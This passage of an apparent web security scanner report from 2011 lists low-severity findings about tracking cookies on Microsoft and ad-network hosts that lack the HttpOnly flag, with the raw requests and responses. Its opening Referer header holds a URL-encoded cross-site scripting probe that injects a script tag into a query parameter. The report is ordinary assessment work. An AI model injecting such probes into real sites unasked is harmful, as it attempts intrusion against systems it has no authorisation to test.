Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNDA5ODgzMTg0LjMwMTY0NzQ2AAAAAAADAAAACgAAAEBSJ066TSdO8gEAALNNJ06zTSdOWgAAACpUJ07XUidOAgAAABMAAABAUidOs00nTjcAAAAqVCdO11InTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Jul 2011 17:35:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNDA5ODgzMTg0LjMwMTY0NzQ2AAAAAAADAAAACgAAAGdjKE5nYyhO8gEAALNNJ06zTSdOWgAAACpUJ07XUidOAgAAABMAAABnYyhOZ2MoTjcAAAAqVCdO11InTgAAAAA-; path=/; expires=Sun, 18-Jul-2021 17:35:35 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

11.147. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAXAAAACgAAADOaKU4zmilOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAAIlpKU6JaSlOzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAJRpKU5/aSlOoAEAAEUWJk5sFSZOKwIAABCSKE7/kShOZQEAAPy68E38uvBN8gEAAGhsKU7yaClORwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAPGpKE6uqChODQEAAKqvKE5/ryhOEAAAAK1tKU7uaClOIAEAAB1sKU4PaSlOZQIAAK5pKU5taSlOxwEAALdpKU58aSlORQIAAAlqKU4JailOCwAAABMAAAAzmilOM5opTmYAAAC3aSlOfGkpThUAAADbjiROxI4kTkQAAACUaSlOf2kpTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTmcAAACqryhOf68oThQAAACtbSlO7mgpTgAAAAA-; path=/; expires=Mon, 19-Jul-2021 15:41:39 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif?&dcsdat=1311349305758&dcssip=www.microsoft.com&dcsuri=/en-au/netsolutionswa/casestudies.aspx&dcsqry=?bladeFlyout=LocalePicker%26SearchType=0%26navIndex=2%26hdrFo=mthdr02&dcsref=http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker%26SearchType=0%26navIndex=2%26hdrFo=mthdr02&WT.co_f=22a4c8d552b80ee48fa1311338505760&WT.vtid=22a4c8d552b80ee48fa1311338505760&WT.vtvs=1311349305760&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Case%20Studies&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=948x845&WT.fv=10.3&WT.slv=Not%20enabled&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.microsoft.com%2Fen-au%2Fnetsolutionswa%2Fcasestudies.aspx&WT.sli=Not%20Installed&WT.z_locale=en-au&WT.dcsvid=b99db294605ea749842ddaca50c2f3af&WT.z_anonid=AxUFAAAAAAB%2BCQAAAIpTytFFhH8oVryAJxM8%2Fw!!&WT.z_rioid=200000862-6%2F21%2F2011%207%3A34%3A30%7C200024632-6%2F4%2F2011%2017%3A55%3A19&WT.z_msresearch_u=13086594073305308045977726579&WT.z_msresearch_s=&WT.z_MUID=E361C23374E642C998D8ABA7166A75EC&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_nvr1=1&WT.vt_nvr2=1&WT.vt_nvr3=1&WT.z_Initial=0&wtEvtSrc=www.microsoft.com%2Fen-au%2Fnetsolutionswa%2Fcasestudies.aspx&wtDrillDir=%2Fen-au%2F%3B%2Fen-au%2Fnetsolutionswa%2F&WT.dep=wtEvtSrc%3BwtDrillDir HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAXAAAACgAAAI1qKU7FaClOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAAIlpKU6JaSlOzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAJRpKU5/aSlOoAEAAEUWJk5sFSZOKwIAABCSKE7/kShOZQEAAPy68E38uvBN8gEAAGhsKU7yaClORwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAPGpKE6uqChODQEAAKqvKE5/ryhOEAAAAK1tKU7uaClOIAEAAB1sKU4PaSlOZQIAAK5pKU5taSlOxwEAALdpKU58aSlORQIAAAlqKU4JailOCwAAABMAAABobClOxWgpTmYAAAC3aSlOfGkpThUAAADbjiROxI4kTkQAAACUaSlOf2kpTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTmcAAACqryhOf68oThQAAACtbSlO7mgpTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 15:41:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAXAAAACgAAADOaKU4zmilOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAAIlpKU6JaSlOzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAJRpKU5/aSlOoAEAAEUWJk5sFSZOKwIAABCSKE7/kShOZQEAAPy68E38uvBN8gEAAGhsKU7yaClORwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAPGpKE6uqChODQEAAKqvKE5/ryhOEAAAAK1tKU7uaClOIAEAAB1sKU4PaSlOZQIAAK5pKU5taSlOxwEAALdpKU58aSlORQIAAAlqKU4JailOCwAAABMAAAAzmilOM5opTmYAAAC3aSlOfGkpThUAAADbjiROxI4kTkQAAACUaSlOf2kpTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTmcAAACqryhOf68oThQAAACtbSlO7mgpTgAAAAA-; path=/; expires=Mon, 19-Jul-2021 15:41:39 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

11.148. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAXAAAACgAAADOaKU4zmilOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAAIlpKU6JaSlOzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAKIrKk6iKypOdQAAAJRpKU5/aSlOoAEAAEUWJk5sFSZOKwIAABCSKE7/kShOZQEAAPy68E38uvBN8gEAAGhsKU7yaClORwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAPGpKE6uqChODQEAAKqvKE5/ryhOEAAAAK1tKU7uaClOIAEAAB1sKU4PaSlOZQIAAK5pKU5taSlOxwEAALdpKU58aSlORQIAAAlqKU4JailOCwAAABMAAAAzmilOM5opTmYAAAC3aSlOfGkpThUAAACiKypOoisqTkQAAACUaSlOf2kpTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTmcAAACqryhOf68oThQAAACtbSlO7mgpTgAAAAA-; path=/; expires=Tue, 20-Jul-2021 02:02:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif?&dcsdat=1311386536139&dcssip=msdn.microsoft.com&dcsuri=/en-us/devlabs/dd491992.aspx&dcsref=http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description&WT.tz=-5&WT.bh=21&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Code%20Contracts&WT.js=Yes&WT.jv=1.5&WT.bs=948x802&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.dcsdat=1311386536139&WT.co_f=277a418e8d9e6e473f71311375736143&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=277a418e8d9e6e473f71311375736143.1311386536143&WT.vt_nvr0=1&WT.vt_nvr2=1&WT.vt_nvr3=1&WT.vt_nvr4=1&wt_date=2011/7/22&wt_dos=1&wtDrillDir=/en-us/;/en-us/devlabs/&wtEvtSrc=msdn.microsoft.com/en-us/devlabs/dd491992.aspx HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/devlabs/dd491992.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAXAAAACgAAADOaKU4zmilOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAAIlpKU6JaSlOzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAJRpKU5/aSlOoAEAAEUWJk5sFSZOKwIAABCSKE7/kShOZQEAAPy68E38uvBN8gEAAGhsKU7yaClORwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAPGpKE6uqChODQEAAKqvKE5/ryhOEAAAAK1tKU7uaClOIAEAAB1sKU4PaSlOZQIAAK5pKU5taSlOxwEAALdpKU58aSlORQIAAAlqKU4JailOCwAAABMAAAAzmilOM5opTmYAAAC3aSlOfGkpThUAAADbjiROxI4kTkQAAACUaSlOf2kpTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTmcAAACqryhOf68oThQAAACtbSlO7mgpTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 02:02:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAXAAAACgAAADOaKU4zmilOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAAIlpKU6JaSlOzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAKIrKk6iKypOdQAAAJRpKU5/aSlOoAEAAEUWJk5sFSZOKwIAABCSKE7/kShOZQEAAPy68E38uvBN8gEAAGhsKU7yaClORwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAPGpKE6uqChODQEAAKqvKE5/ryhOEAAAAK1tKU7uaClOIAEAAB1sKU4PaSlOZQIAAK5pKU5taSlOxwEAALdpKU58aSlORQIAAAlqKU4JailOCwAAABMAAAAzmilOM5opTmYAAAC3aSlOfGkpThUAAACiKypOoisqTkQAAACUaSlOf2kpTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTmcAAACqryhOf68oThQAAACtbSlO7mgpTgAAAAA-; path=/; expires=Tue, 20-Jul-2021 02:02:10 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

11.149. http://m.webtrends.com/dcso6p7z7100004j151amwxpo_5q2j/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcso6p7z7100004j151amwxpo_5q2j/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAAcvJk6eLSZOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAFajJU56oCVOoAEAAEUWJk5sFSZOKwIAAHOGKE5zhihOZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABzhihOc4YoTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAABWoyVOeqAlTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-; path=/; expires=Sun, 18-Jul-2021 20:05:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcso6p7z7100004j151amwxpo_5q2j/dcs.gif?&dcsdat=1311278714536&dcssip=www.microsoft.com&dcsuri=/en-us/default.aspx&dcsref=http://www.microsoft.com/&WT.co_f=173.193.214.243-3661456592.30151123&WT.vtid=173.193.214.243-3661456592.30151123&WT.vtvs=1311278714528&WT.tz=-5&WT.bh=15&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Microsoft%20Corporation%3A%20Software%2C%20Smartphones%2C%20Online%2C%20Games%2C%20Cloud%20Computing%2C%20IT%20Business%20Technology%2C%20Downloads&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x723&WT.fv=10.3&WT.slv=Not%20enabled&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.microsoft.com%2Fen-us%2Fdefault.aspx&WT.sli=Not%20Installed&WT.z_locale=en-us&WT.dcsvid=b99db294605ea749842ddaca50c2f3af&WT.z_anonid=AxUFAAAAAAB%2BCQAAAIpTytFFhH8oVryAJxM8%2Fw!!&WT.z_rioid=200000862-6%2F21%2F2011%207%3A34%3A30%7C200024632-6%2F4%2F2011%2017%3A55%3A19&WT.z_msresearch_u=13086594073305308045977726579&WT.z_msresearch_s=&WT.z_MUID=E361C23374E642C998D8ABA7166A75EC&WT.vt_f_tlh=1311278714&WT.z_Initial=0&wtEvtSrc=www.microsoft.com%2Fen-us%2Fdefault.aspx&wtDrillDir=%2Fen-us%2F&wt_linkId=400-00-121GMUS007346%3B405-00-121GMUS007346%3B410-27-121LSUS008430%3B410-00-121LSUS008124%3B410-00-121LSUS008043%3B410-00-121GSUS007484%3B420-00-121GMUS007396%3B420-00-121GSUS007530%3B420-00-121LSUS008326%3B430-00-121LSUS008589%3B430-00-121LSUS008150%3B440-00-121LSUS008126%3B440-00-121LSUS007870%3B440-00-121LSUS008430%3B440-00-121LSUS008055%3B440-00-121LSUS008145%3B440-00-121LSUS008137%3B450-00-121LSUS008144%3B450-00-121GMUS007346%3B450-00-121LSUS008123%3B450-00-121LSUS008659%3B450-00-121LSUS008054%3B050-00-121LSUS007780%3B050-00-121LSUS007778%3B050-00-121LSUS007779%3B050-00-121LSUS007781%3B050-00-121LSUS007782%3B050-00-121LSUS007784&WT.dep=wtEvtSrc%3BwtDrillDir%3Bwt_linkId HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAAcvJk6eLSZOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAFajJU56oCVOoAEAAEUWJk5sFSZOKwIAAHYvJk5uLSZOZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAAB2LyZObi0mTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAABWoyVOeqAlTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Jul 2011 20:05:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAAcvJk6eLSZOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAFajJU56oCVOoAEAAEUWJk5sFSZOKwIAAHOGKE5zhihOZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABzhihOc4YoTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAABWoyVOeqAlTpQAAABFFiZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-; path=/; expires=Sun, 18-Jul-2021 20:05:07 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

11.150. http://media.fastclick.net/w/get.media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/get.media

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pjw=BAIAAAACIAMDQnMoTiAGAQABIAMCkRMDYAcCLWEIIA2AEwA/4AIfATjZgB8CUTQHIB1AHwEAAA==; domain=.fastclick.net; path=/; expires=Sat, 23-Jul-2011 18:43:14 GMT
vt=10070:252216:472145:38735:0:1311273791:1|9930:201617:549165:38735:0:1311273794:1|; domain=.fastclick.net; path=/; expires=Sat, 20-Aug-2011 18:43:14 GMT
adv_ic=BwIAAABCcyhOIAYGAAFJAAA1TyAHIAtAAAA/4AIXARtZwBcBAAA=; domain=.fastclick.net; path=/; expires=Sat, 20-Aug-2011 18:43:14 GMT
pluto=571814024282|v1; domain=.fastclick.net; path=/; expires=Sat, 20-Jul-2013 18:43:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.151. http://media.trafficmp.com/a/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.trafficmp.com
Path:	/a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_f2eb=h1d%3Acvq%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
dly2=3-lop3e3-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
dmg2=2-null7566%4052%4076+57%3A56%3A60%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
hst2=3-lop3e3-1~89jazr1df64m~3mt~5al7~0-1~kx3bm41vejeq~3mt~5al7~1-1~1ksbhusx5p0nk~3mu~5al9~6-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
rth=2-looqid-h1d~cvq~1~1-22063~cvm~1~0-dlx~0~1~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 21 Jul 2011 18:01:14 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_jayi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bzbi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1le=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_igy5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f2eb=h1d%3Acvq%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: dly2=3-lop3e3-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: dmg2=2-null7566%4052%4076+57%3A56%3A60%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: hst2=3-lop3e3-1~89jazr1df64m~3mt~5al7~0-1~kx3bm41vejeq~3mt~5al7~1-1~1ksbhusx5p0nk~3mu~5al9~6-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Set-Cookie: rth=2-looqid-h1d~cvq~1~1-22063~cvm~1~0-dlx~0~1~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:15 GMT; Path=/
Content-Length: 15382

document.write('\<img src=\"http://lm.trafficmp.com/clicksense/images/pixel.png?epic=7137432672015918080\&et=89jazr1df64m\" height=\"1\" width=\"1\"/\> \<scr');
document.write('ipt type=\"text/javas
...[SNIP]...

11.152. http://media.trafficmp.com/a/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.trafficmp.com
Path:	/a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_4hgv=h1d%3Acvl%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
dly2=3-lop3dy-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
dmg2=2-null7566%4052%4076+57%3A56%3A65%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
hst2=3-lop3dy-1~d188rsjo2prx~3mu~5al9~0-1~1ksbhusx5p0nk~3mu~5al9~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
pct=1-vOrunivbe~gqe1232m-yhpvq~gqe1232n-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/
rth=2-looqid-h1d~cvl~1~1-dlx~0~1~1-; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.153. http://msdn.microsoft.com/magazine/ee336135.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/magazine/ee336135.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.154. http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mssto.112.2o7.net
Path:	/b/ss/msstoerrors/1/H.20.2--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_fxxxxx7Fdnyydyxx=[CS]v4|2715169805012A6A-4000010AE034697F|4E2A2D1E[CE]; Expires=Thu, 21 Jul 2016 02:08:48 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.155. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tick=1311428904052; Domain=outbrain.com; Path=/
_lvs2="j+h62nK2TPURNKjjEdyRnx2N9yctwBWzpsihGXuJnX/DefeUKLZcLYPoVy+pA8i3fTp6Cju1VRjpirRUEhLqCbVfZKqLBPSa"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 18-Aug-2012 13:48:24 GMT; Path=/
_lvd2="qtpqO/EVmeM1+QgA/tr6aVDeiUxOdLZhyAHLjKAQtgVwkdgtXnAWOhwdtjL3zIPYc7Eb6If9sKC+6m534M6S+tr86htT0XnND9jIj29F2lirzsyOIrriqjYcVau3cxBoosYOorDJx60="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 30-Jul-2011 02:36:24 GMT; Path=/
_rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 18-Aug-2012 13:48:24 GMT; Path=/
